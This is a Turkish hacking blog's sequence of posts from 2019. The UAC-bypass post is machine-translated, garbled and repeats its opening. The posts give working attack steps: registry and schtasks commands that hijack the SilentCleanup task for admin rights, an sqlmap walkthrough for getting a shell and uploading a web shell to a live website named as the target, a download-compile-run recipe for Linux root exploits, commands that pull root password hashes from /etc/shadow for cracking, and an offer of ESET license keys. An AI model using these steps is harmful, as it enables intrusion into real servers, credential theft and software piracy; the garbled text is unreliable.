7 Eylül 2019 Cumartesi

UAC Bypass w/ Exploiting Scheduled Tasks

Windows Görev Zamanlayıcı, ayrıcalıklı yükselişler bulmak ve bulmak için harika bir yerdir, tipik olarak Windows‘a SUID stili yetenekleri yanlış anlaşılması kolay bir pakette eklemek kötüye kullanılır. Programları LocalSystem olarak çalıştırabilir, UAC için uygulamaları otomatik olarak kaldırabilir, hatta isteğe bağlı COM nesnelerini barındırabilir. Sonuç olarak bu bir karışıklıktır, bu yüzden programlayıcıda veya görevlerde hata bulmak özellikle zor değildir. Örneğin burada var birkaç Ben ettik bulundu önce . Bu kısa blog, UAC ile sessizce çalışan, en yüksek bilgi istemi seviyesine ayarlanmış ve herhangi bir dosyayı (bir kayıt defteri anahtarının dışında) diske bırakmadan çalıştırılabileceğini keşfeden hızlı ve kirli bir UAC bypass‘ı hakkında.

Her neyse, teknik olarak Microsoft ürünlerinde hata bulmak (bu yüzden neden olmasın diye sormaktan kaçınmak) konusunda sabote ediyorum. Ancak bazen ben bakmıyorken size sadece bir böcek üzerinde gezi tür. Çeşitli zamanlanmış görevlerin etrafında duruyordum ve ilginç görünen birinin, SilentCleanup olduğunu fark ettim . Bunun ilginç olmasının otomatik yükseltme olarak işaretlenmiş olması (bu durumda arayan kişi bölünmüş bir yönetici ise sessizce UAC yöneticisi olarak çalıştırılacak) ve yönetici olmayan kullanıcı tarafından manuel olarak başlatılabilir.

Anlaşılan bu ilginç olduğunu farketmeden yalnız değilim, Matt Nelson zaten bu zamanlanmış görevde bir UAC atlaması buldu. fakat tespit edilebildiği kadarıyla zaten düzeltildi, yani hala onu kullanmanın bir yolu var mı? Görmek için Powershell‘i kullanarak görevin özelliklerinden bazılarını bırakalım.
Windows Görev Zamanlayıcı, ayrıcalıklı yükselişler bulmak ve bulmak için harika bir yerdir, tipik olarak Windows‘a SUID stili yetenekleri yanlış anlaşılması kolay bir pakette eklemek kötüye kullanılır. Programları LocalSystem olarak çalıştırabilir, UAC için uygulamaları otomatik olarak kaldırabilir, hatta isteğe bağlı COM nesnelerini barındırabilir. Sonuç olarak bu bir karışıklıktır, bu yüzden programlayıcıda veya görevlerde hata bulmak özellikle zor değildir. Örneğin burada var birkaç Ben ettik bulundu önce . Bu kısa blog, UAC ile sessizce çalışan, en yüksek bilgi istemi seviyesine ayarlanmış ve herhangi bir dosyayı (bir kayıt defteri anahtarının dışında) diske bırakmadan çalıştırılabileceğini keşfeden hızlı ve kirli bir UAC bypass‘ı hakkında.

Her neyse, teknik olarak Microsoft ürünlerinde hata bulmak (bu yüzden neden olmasın diye sormaktan kaçınmak) konusunda sabote ediyorum. Ancak bazen ben bakmıyorken size sadece bir böcek üzerinde gezi tür. Çeşitli zamanlanmış görevlerin etrafında duruyordum ve ilginç görünen birinin, SilentCleanup olduğunu fark ettim . Bunun ilginç olmasının otomatik yükseltme olarak işaretlenmiş olması (bu durumda arayan kişi bölünmüş bir yönetici ise sessizce UAC yöneticisi olarak çalıştırılacak) ve yönetici olmayan kullanıcı tarafından manuel olarak başlatılabilir.

Anlaşılan bu ilginç olduğunu farketmeden yalnız değilim, Matt Nelson zaten bu zamanlanmış görevde bir UAC atlaması buldu. fakat tespit edilebildiği kadarıyla zaten düzeltildi, yani hala onu kullanmanın bir yolu var mı? Görmek için Powershell‘i kullanarak görevin özelliklerinden bazılarını bırakalım.



Gelen Principal mülkiyet görebildiğimiz Grup olarak çalışacak şekilde Kullanıcılar Kimliği doğrulanmış gerçekten bir işe başlama oturum açan kullanıcı ile çalışacak anlamına gelir. Ayrıca RunLevel‘in En yükseğe ayarlanmış olduğunu görüyoruz.bu, Görev Zamanlayıcı‘nın görevi istemeden yöneticiye yükseltmeye çalışacağını gösterir. Şimdi eylemlere bakın, bir yol belirtiyor, ancak ilginç bir şey fark ediyor musunuz? Yolun bir parçası olarak bir ortam değişkeni kullanıyor ve UAC senaryolarında bunlar normal bir kullanıcı tarafından HKEY_CURRENT_USER \\ Enviroment kayıt defteri anahtarına yazılarak ve bir REG_SZ değeri belirtilerek etkilenebilir .

Bu yüzden çalıları çalmayı kes, haydi onu kullanmaya çalışalım. C: \\ dummy \\ system32 \\ cleanmgr.exe dosyasına basit bir çalıştırılabilir dosya bıraktım , windir ortam değişkenini c: \\ dummy olarak ayarlayınve zamanlanmış göreve başladım hemen yönetici ayrıcalıklarına sahibim. Öyleyse süreci otomatikleştirelim, ihtiyacımız olan tüm işi yapmak için reg ve schtasks komutlarını kullanabildiğimiz için herkesin favori dilini BATCH kullanacağım . Ayrıca bir dosyayı diske bırakmak istemediğimizden, yürütülebilir yolun Görev Zamanlayıcısı tarafından alıntılanmadığı gerçeğini kötüye kullanabiliriz, bu da isteğe bağlı komut satırı argümanlarını enjekte edebileceğimiz ve sadece basit bir CMD kabuğu çalıştırabiliriz.

Quote:
reg add hkcu\\Environment /v windir /d "cmd /K reg delete hkcu\\Environment /v windir /f REM "
schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I




BATCH dosyası ilk önce windir ortam değişkenini "cmd / K" olarak ayarlar, ardından orijinal windir ortam değişkenini silen aşağıdaki komut dosyası ile satırın geri kalan kısmını yorumlamak için REM kullanır. Bunu Windows 10 Anniversary Edition ve daha üst sürümlerinde split jeton yöneticisi olarak kullanmak, yönetici olarak çalışan bir mermi elde etmenizi sağlar. Daha önceki Windows sürümlerinde test etmedim, bu yüzden YMMV. Bunu MSRC‘ye göndermedim, ancak bir arkadaşım aracılığıyla RS3‘ün gelecek bir sürümünde zaten düzeltilmesi gerektiğini doğruladı, bu yüzden MS, en azından olabildiğince UAC‘yi geri kilitlemeye çalışmak konusunda ciddi görünüyor. .

Quote:
$action = New-ScheduledTaskAction -Execute $env:windir\\System32\\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
Set-ScheduledTask SilentCleanup -TaskPath \\Microsoft\\Windows\\DiskCleanup -Action $action



Başka potansiyel adaylar bulmak istiyorsanız, aşağıdaki Powershell betiği
, otomatik olarak yükselten yürütülebilir eylemlerle tüm görevleri bulacaktır. Sistemimde 4 ayrı görev var, ancak yalnızca bir kişi ( SilentCleanup görevi) normal bir kullanıcı olarak yürütülebiliyor, bu yüzden gerisi sömürülemez. Sanırım iyi bir şey.

6 Eylül 2019 Cuma

Violin Dark - Portfolio HTML5/CSS3 Template Free

$17 dolarlık html5 scripti ücretsiz paylaşıyorum
güle güle kullanırsınız
Demo; Demoya gitmek için Tıkla
İndirme Linki; İndirme Linkine Gitmek İçin Tıkla
Orcun Root'a Teşekkürler 

4 Eylül 2019 Çarşamba

Github'ta Site Barındırmak

{ Merhaba arkadaşlar Github üzerinde nasıl site barındırılır ? Ücretsiz midir ?
Sorularına cevap verelim, Öncelikle ücretsiz bir servis sunmaktadır arkadaşlar.
Peki Github Pages dediğimiz bu hizmeti kullanmak için ne yapmak gerekiyor.
Github hesabımıza giriş yaptıktan sonra New repository diyoruz 
Gerekli alanları dolduruyoruz "Initialize this repository with a README " tikini işaretliyoruz 
Sonra settings bölümünden -> 
Resimde görmüş olduğunuz "master branch" alanını seçiyoruz.
böylece {kullanici.adi}.github.io şeklinde çalışma alanımız aktif hale geliyor.
Projeyi istediğimiz gibi yapılandırabiliriz. 
( Kendi alan adımızada bağlayabiliriz )
Yani DNS yönetiminden 2 adet A kaydı eklemek gerekiyor şu şekilde;
rootayyıldız.com – 192.31.252.153
rootayyıldız.com – 192.31.252.154
Bu işlemden sonra  Github çalışma alanımıza dönerek yeni bir dosya oluşturuyoruz.
Dosyanın adına CNAME yazıyoruz. İçeriğine ise kendi alan adımızı yazıyoruz.
yani yukarıdaki ayarsecurity.com ismini yazmamız yeterli.
Artık “kullaniciadi.github.io” şeklinde değilde www.domain.com şeklinde olacak.
Artık HTMLCSS ve JavaScript dosyalarınızı oluşturduğunuz çalışma alanına ekleyebilirsiniz.
Hatta Jekyll dediğimiz Ruby alt yapısıyla oluşturulmuş bir araç var
Yani basit bir blog sistemi oluşturmaya yarıyor, Kurulumu burada anlatılmış.
Jekyll' yapısında  -> WP-Blogger gibi bloglara import desteğide sunuyor.
Github jekyll kurulumu ile ilgili daha detaylı bilgi ve beceri kazanmak isterseniz.
Youtube'ta bu link < üzerinden videoları izleyebilirsiniz.
Haydin görüşmek üzere. }

3 Eylül 2019 Salı

Sqlmap Shell Upload



Öncelikle Sql açıklı sitemizi buluyoruz
ve sitemizde bir sqlmap sorgusu başlatıyoruz.Fakat bu sorgu diğerlerinden
farklı oluyor.


Bu sefer --dbs komutu yerine --current-user --is-dba komutunu gireceğiz.

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --dbs
yerine

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --current-user --is-dba
komutu ile ancak Sorgulamayı başlatabiliriz. Biraz bekledikten sonra eğer şöyle birşey görürseniz.


Kod:
current user is DBA : True 

Bilinizki shell sokmaya çok yakınsınız.Peki şimdi ne yapacağız?

Kod:
sqlmap -u "www.sqlsorgulanacaksite.com/php?id=" --os-shel
Yapıyoruz ve karşımıza sitenin yazılmış olduğu dili soruyor.Bu dili şu yolla bulabiliriz. 

Mesela sitemiz şu

Kod:
https://www.diapers.com/ 
bu siteye girdim ve .comdan sonra şunu denedim

Kod:
https://www.diapers.com/index.php
Pagenotfound hatası aldım demekki php ile yazılmamış.Daha sonra şunu denedim

Kod:
https://www.diapers.com/index.asp
Gene Pagenotfound hatası aldım demekki asp ile de yazılmamış.Fakat şunu denediğimde

Kod:
https://www.diapers.com/index.aspx 
Ana sayfasına ulaştım yani sayfa aspx dili ile yazılmış.Sqlmap size şöyle
seçenekler verir.

|1|ASP
|2|ASPX
|3|PHP
|4|JSP

bu durumda Sayfamızın dilini yani aspx'i işaretledik.Hedef sitemiz diapers.com çünkü.


Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte (.php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp)


enterlamanız yeterli örnek:

Kod:
www.hedefsite.com/events/supercali/tmpuhvef.php
de upload ediyoruz mesela shellimin adı k2.php olsun

Kod:
www.hedefsite.com/events/supercali/k2.php 

30 Ağustos 2019 Cuma

Linux Local Root Arşiv 2004-2017

https://dosya.co/gs0j8j4gjhv3/L_K_E.zip.html

Kernel Root Exploit Tarıyıcı

şimdi bi sunucuyu rootlamak istiyoruz ama kerneli rootlamaya uygunmu değilmi bunu tespit eden exploit
eğer SAFE_KERNEL uyarısı verirse olumsuz yani rootlanmaz MITIGATED uyarısı verirse biraz uğraşmaya değer ! SAFE_KPATCH uyarısı var ise yeni patch almış demektir  VULNERABLE uyarısı verirse rootlamaya başlaya bilirsiniz



Linux Server Rootlama ( Dirty.c )

python -c 'import pty; pty.spawn("/bin/sh")'

29 Ağustos 2019 Perşembe

30 Ağustos Zafer Bayramı

30 ağustos zafer bayramınız kutlu olsun


28 Ağustos 2019 Çarşamba

Skandal Facebook


Mozilla yayınladığı son


SWAPGS saldırısı



26 Ağustos 2019 Pazartesi

Linux'de Bilgi Güvenliği ve Exploit Derlemek

Linux'de Bilgi Güvenliği ve Exploit Derlemek


Linux (CentOS) makinelerde bilgi güvenliği için kullanılan komutlar ve Exploit derleyip çalıştırmak için gerekli bilgileri bu makale altında toplayacağım. Aşağıdaki komutlar ile Linux sunucu üzerinde güvenlik ve zaafiyet önlemek için bilgiler edinebilirsiniz.

Linux'de tüm kullanıcıların (Root dahil) Username, UID değerleri, izin yollarını öğrenmek için;
cat /etc/passwd

rootayyıldız:x:0:0:root:/root:/bin/bash
0 ID olanlar Root yetkilerine sahip kullanıcılardır.


Root kullanıcı parolası için kullanılan şifreleme algoritmasını öğrenmek için;
authconfig --test | grep hashing

Makinenin kernel bilgisini öğrenmek için;
uname -a

Linux'de herhangi bir Exploit derlemek için;
yum -y install wget
wget http://exploit-sitesi/vuln.c
gcc -w -o exploit vuln.c
./exploit

Linux işletim sistemli makinelerde kullanıcıların parolalarının özeti "/etc/shadow" dosyasında tutulmaktadır. Dosyayının tamamını görüntülemek için;
cat /etc/shadow

Root kullanıcı parolasının HASH değerini öğrenmek için (Başka kullanıcılar için root yerine öğrenmek istediğiniz kullanıcının adını yazmanız yeterli);
cat /etc/shadow | grep "root:"

Kullanıcı parolasının Sadece HASH değerlerini almak için (Aşağıdaki komut root içindir);
cat /etc/shadow | grep "root:" | cut -d "$" -f4 | cut -d ":" -f1
# cat /etc/shadow | grep "root:" | cut -d ":" -f2

HASH değerleri Password Mangle yöntemleri ile Password Mangler Bash Script sunucuya indirip çalıştırıldıktan sonra Brute Force yöntemi ile bulunabilir.


Linux'de FSTAB Dosyası

/etc/fstab dosyası, sistemdeki aygıtların dosya sistemleri hakkında bilgilerini içeren bir sistem dosyasıdır. Dosyayının tamamını görüntülemek için;
cat /etc/fstab

FSTAB dosyasında şu bilgilere erişebilirsiniz; Sisteme bağlı aygıtlar, Aygıtların mount edildiği noktalar, Aygıtların dosya sistemleri, Dosya sistemi seçenekleri.

Bilgi güvenliği açısından FSTAB, içerisinde derlenmeye çalışan veya derlenirken hata veren Exploit dosyalarını görüntüleyebilirsiniz.

Linux'de Geçmiş Komutları Görüntülemek;

Sunucuda geçmiş komutları görüntülemek için;
history

Sunucuda geçmişte kullanılan komutlarının hepsini silmek;
history -c

Kullanıcıya ait geçmişi görüntülemek (Sunucuda rootayyıldız kullanıcısının SSH üzerinde yazdığı komutları öğrenmek için);
history | grep rootayyıldız

Geçmiş komutlarda aramak istediğimiz kelime veya dizin yolu için;
history | grep aranacak-kelime

Sunucu üzerinde oluşturulan ve silinen kullanıcıların kayıtlarını /var/log/secure dosyasından öğrenebilirsiniz. Linux'de tüm log kayıtları ise  /var/log dizini içinde tutulur.

Hangi dosyada 1 gün veya 3 gün içinde düzenlenmiş, içeriği değiştirilmiş veya nerelerde çalışma yapılmış öğrenemek için;
find -mtime -1
find -mtime -3

Tüm logları görmek için;
cat /var/log/secure

Silinen kullanıcı loglarını görmek için;
cat /var/log/secure | grep userdel

Linux CentOS'da Apache sunucudaki loglar /var/log/httpd dizini içinde tutulur. Apache, modsec_audit, mod_security ve hata kayıtları (error_log) gibi log dosyalarını inceleyebilirsiniz.

CentOS Sunucuya Get Flood saldırısı yapan IP listesini ve gönderdiği talepleri öğrenmek için;
cat /var/log/httpd/accedd_log | cut -d "-" -f1 | sort | uniq -c

Root veya sunucudaki bir kullanıcı hangi IP ile SSH bağlantısı yaptığını known_hosts dosyasına bakarak öğrenebiliriz. İlk olarak ilgili kullanıcının SSH dosya yoluna gidelim;

Kullanıcı Root ise;
cd /root/.ssh/

Home dizini altındaki bir kullanıcı, Örnek: rootayyıldız;
cd /home/rootayyıldız/.ssh/

Dosyayı okuyarak bağlandığı IP adresini görebiliriz;
cat known_hosts

Pardus Kurulum Kılavuzu

Pardus Kurulum Kılavuzu

Kurulum ortamını (DVD, USB, vb.) yerleştirerek bilgisayarınızı yeniden başlatınız.
Önyükleme menüsünde bulunan “Pardus Çalışan” seçeneği ile kuruluma başlamadan Pardus’u inceleyebilir, masaüstünde bulunan “Pardus Yükle” simgesine tıklayarak grafik arayüz ile kuruluma başlayabilirsiniz.
Dil seçimi yaparak ilerleyiniz.
Konum seçimi yaparak ilerleyiniz. Bir önceki ekranda seçilen dil ayarlarına göre otomatik konum gelmektedir. “diğer” seçeneği ile farklı bir konum tanımlayabilirsiniz.
Kullanılacak klavye düzenini seçerek ilerleyiniz.
Ağda bilgisayarınızın adını benzersiz kılacak bir makine adı belirleyiniz.
Etki alanı adınızı tanımlayınız, herhangi bir etki alanına dahil değilseniz boş bırakınız.
Kurulacak sistemdeki oluşturulacak kullanıcının tam adını giriniz.
Yeni oluşacak hesap için kullanıcı adı belirleyiniz.
Tanımlanan kullanıcı için parola belirleyiniz.
pk-dikkatBilgisayarınız UEFI sistemini destekliyorsa bu ekranda seçim yapınız. Seçiminize göre kurulum aracı kurulacak diskin baş kısmına “EFI Sistem Bölümüoluşturarak kurulum yapacaktır.
Yardımcı ile – diskin tamamını kullan” seçeneği ile kurulum aracı sizin yerinize tüm bölümlemeyi yapacaktır. Seçili diski tamamen biçimlendirerek kurulum başlayacaktır.
pk-dikkatOtomatik bölümleme haricinde bir disk tanımlaması için “Elle” seçeneğini kullanabilirsiniz. Bu seçenek ile işletim sistemi için gerekli tüm bölümleri elle oluşturmanız gerektiğini unutmayınız.
Kurulum yapılacak diski seçerek ilerleyiniz.
Disk bölümleme yapısını seçerek ilerleyiniz. Tüm dosyaların tek bölümde kurulması önerilmektedir.
Seçimler sonucunda oluşan yapıya onay vererek ilerleyiniz.
Değişiklikleri kaydederek ilerleyiniz.
Paket yöneticisinin kullanacağı depo adresini tanımlayınız. Farklı bir adres kullanılmayacak ise otomatik olarak gelen adresi onaylayarak devam ediniz.
Pardus önyükleyicisinin kurulumu için onay vererek ilerleyiniz. Bu işlem sonrasında Pardus kendi önyükleyicisini kuracak, daha önce kurulu olan sistemleri okuyarak açılış ekranında seçiminize sunacaktır.
Grub önyükleyicisinin kurulacağı diski seçiniz.
KURULUM TAMAMLANDI!
Bu aşamadan sonra kurulum ortamını (DVD, USB, vb.) cihazınızdan çıkarmayı unutmayınız.

Eset Nod32 + Eset Smart Security Güncel Key 2019+

Eset Nod32 + Eset Smart Security Güncel Key 2019+
Her zaman güncel olan ve sürekli olarak yenilenen eset deneme sürümü keyleri burada sizlere sunulacak. Aşağıda yer alan eset deneme sürümü lisansları bozuk vey çalışmıyorsa bizlere iletirseniz bizlerde ivedi olarak kontrolleri sağlar yeni deneme keylerini sizlerle paylaşırız. Sitemiz her zaman kullanıcıların çıkarlarını gözetip faydalı olacak her türlü içeriği paylaşmaya özen göstermiştir bundan sonrada devam edeceğiz bu paylaşımlara.
2019  EYLÜL  güncel serial key
YENİ 2019 SÜRELİ Lisanslar güncel
=======================
 Ağustos EYLÜL 2019 Tüm Güncel keyler


PC deki Açık Portları Kapatma





Başlat\Çalıştır cmd yazın enterlayın. Komut satırına netstat &#8211;an yazın ve PC&#8217;mizdeki açık portalar bakalım.(C:\netstat -an

İl.Kr. Yerel Adres Yabancı Adres Durum

TCP 0.0.0.0:25 0.0.0.0:0 LISTENING

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:443 0.0.0.0:0 LISTENING

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING

TCP 0.0.0.0:1110 0.0.0.0:0 LISTENING

TCP 127.0.0.1:1029 0.0.0.0:0 LISTENING

TCP 127.0.0.1:2783 127.0.0.1:1110 CLOSE_WAIT

TCP 192.168.1.33:139 0.0.0.0:0 LISTENING

TCP 192.168.1.33:2769 207.46.2.36:1863 ESTABLISHED



Şimdi burada 3. satırda 135. Portun Durumu LISTENING olarak gösteriliyor. Bu demektir ki 135 nolu portumuz dinleme modunda yabancı adresten gelecek olan bağlantı isteğini kabul edecek ve bağlantı kuracaktır.

Şimdi PC&#8217;mizdeki açık portları öğrendik sıra bunları nasıl kapatacağımızda. En çok saldırı alan portan 139 nolu porttan başlıyoruz.

=== 139 NOLU PORTUN KAPATILMASI ===
Eğer bu portumuz açık ise kolaylıkla NetBios üzerinden PC&#8217;mize erişim sağlanır. Kapatmak için sırasıyla; Ağ Bağlantılarım(Sağ tıklayın) Yerel Ağ Bağlantısı(Sağ tıklayın)\Özellikler\Internet İletişim Kuralları(TCP/IP) çift tıklayın. Ardından Gelişmiş tuşuna tıklayın WINS sekmesine geçin, en altta TCP/IP üzerinden NetBOIS&#8217;u devre dışı bırak ı işaretleyip Tamam&#8217;a basın. Tamamdır 139 nolu Portumuzu kapattık.

=== 135 NOLU PORTUN KAPATILMASI ===
Regedit&#8217;i(Kayıt Defteri) açın. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole dizinine tıklayın. Sağ tarafta EnableDCOM verisine çift tıklayın ve Değer Verisini N olarak değiştirin.

Bir üst dizine geçin(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RPC).S ağ tarafta DCOM Protocols değerine çift tıklayın ve ncacn_ip_tcp adlı veriyi silin diğer verilere karışmayın. Tamamdır.135 nolu Portumuz kapattık.

=== 445 NOLU PORTUN KAPATILMASI ===
Regedit&#8217;e girin. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\NerBT\Parameters sağ tarafta bulunan TransportBindName verisine çift tıklayın ve içerisindeki -Device- girdisini silin. Tamamdır.445 nolu Portumuzu başarıyla kapattık.